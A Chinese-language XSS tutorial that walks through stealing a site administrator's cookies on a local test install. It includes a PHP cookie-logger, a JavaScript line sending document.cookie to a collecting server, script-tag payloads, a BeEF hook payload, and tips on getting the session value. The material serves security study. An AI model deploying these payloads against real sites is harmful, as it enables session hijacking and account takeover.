目錄
- 1.初識xxs跨站漏洞
- 2.xss的型別
- 2.1反射型
- 2.2存盤型
- 2.3DOM型
- 3.測驗環境搭建
- 3.1搭建測驗網站
- 3.2獲取xss攻擊代碼
- 4.實戰演示
- 5.利用自定義xss獲取cookie
- 6.beef工具實作xss
1.初識xxs跨站漏洞
xss能干什么?
利用xss獲取對方后臺地址、cookie資訊,得到cookie和后臺地址后,能通過相關工具(比如postman)進行后臺登錄:
其他補充:
cookie :一般用于小中型網站,一般存盤在自己電腦上,存活時間較長
session:采用會話模式,一般用于大型網站,一存盤在服務器上,存活時間較短
2.xss的型別
2.1反射型
當在網頁插入下列xss代碼后,會立即回饋到螢屏,但這條xss代碼并不會一直存盤到該網站上
<script>alert(1)</script>
提交后回傳:
2.2存盤型
利用xss跨站漏洞,基本都是建立在存盤型上,其他型別只作了解
例如留言板、評論、訂單資訊、反饋等,能一直留在后臺上
2.3DOM型
采用JavaScript進行處理,保存在前端
這句代碼并不包含攻擊性,可以用來測驗是否有xss漏洞
<script>alert(1)</script>
同時,也可以改成帶攻擊的代碼,進行竊取cookie
3.測驗環境搭建
3.1搭建測驗網站
首先下載軍鋒真人cs野戰的原始碼:
http://js.down.chinaz.com/201202/jfdd_v2.0.zip
解壓到網站目錄,訪問網站地址127.0.0.1/jfdd/install.php
進行一步步安裝即可(后臺密碼也在這兒設定)
設定好能夠登錄網站后臺,表示初始化成功
3.2獲取xss攻擊代碼
在xss平臺注冊賬號,并創建好專案:
https://xss8.cc/
創建專案配置代碼這塊可以根據自己的需求勾選,我這里只勾選了默認
配置好后,點擊查看代碼
我們這里隨便選取一條代碼即可
4.實戰演示
隨便選擇一條代碼,放到登錄界面任意位置,點擊提交即可
這時候,只要網站管理員登錄到后臺查看了這條資訊,就可以截取到對方的cookie值,
模擬管理員登錄后臺,并查看此條資訊
在xxs平臺即可看到截獲的cookie
只要獲取到完整的cookie資料,我們就可以利用工具進行連接登錄到后臺,(完整cookie包括cookie和session,但是一般xss平臺是截取不到session的,所以請讀者另想辦法,思路:獲取phpinfo中的cookie)
然后我們使用postman進行連接登錄后臺即可
5.利用自定義xss獲取cookie
1.在web服務器上創建一個write_cookie.php檔案
write_cookie.php代碼如下
<?php
$cookie=$_GET['c'];
$str=fopen('cookie.txt','w');
fwrite($str,"$cookie");
fclose($str);
?>
代碼解釋
$cookie=$_GET['c'];獲取鏈接中c引數的值
其他代碼就打開并寫入到cookie.txt檔案中
2.在web服務器端創建send_cookie.js檔案
代碼如下:
其中src的地址為自己服務器的地址
new Image().src="http://127.0.0.1/write_cookie.php?c=" + encodeURI(document.cookie);
構造payload
<script src=http://127.0.0.1/send_cookie.js></script>
將構造好的payload插入到測驗點中
當管理員登錄到后臺查看此訂單時,將會將管理員cookie資料發送到web服務器
查看服務器,收到了cookie資料
6.beef工具實作xss
beef安裝教程:
https://blog.csdn.net/weixin_43148062/article/details/105601649
配置好beef之后,寫一個payload,src為beef的服務器地址(在beef組態檔中可以看到)
<script src="//127.0.0.1:3000/hook.js"></script>
和之前的步驟一樣,將payload寫入測驗站
登錄beef后臺,當測驗站管理員登錄并查看資訊后,beef后臺將會有主機上線(xx號已上機~歡迎您的使用[doge])
使用beef獲取網站cookie
beef的功能很強大,這里僅示范一個獲取cookie的操作,其他請讀者自行探索!
xss相關補充文章:
== 你知道嗎,你用的大馬可能早就被別人裝后門了!!==
如何檢查自己用的大馬是否被寫了后門?如何利用xss反殺別人寫了后門的大馬?
歡迎繼續閱讀下篇文章:“黑吃黑”的webshellbox
本篇文章僅作技術學習研究,切勿拿來行壞事!!任何違法操作都與本文作者無關,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/357031.html
標籤:其他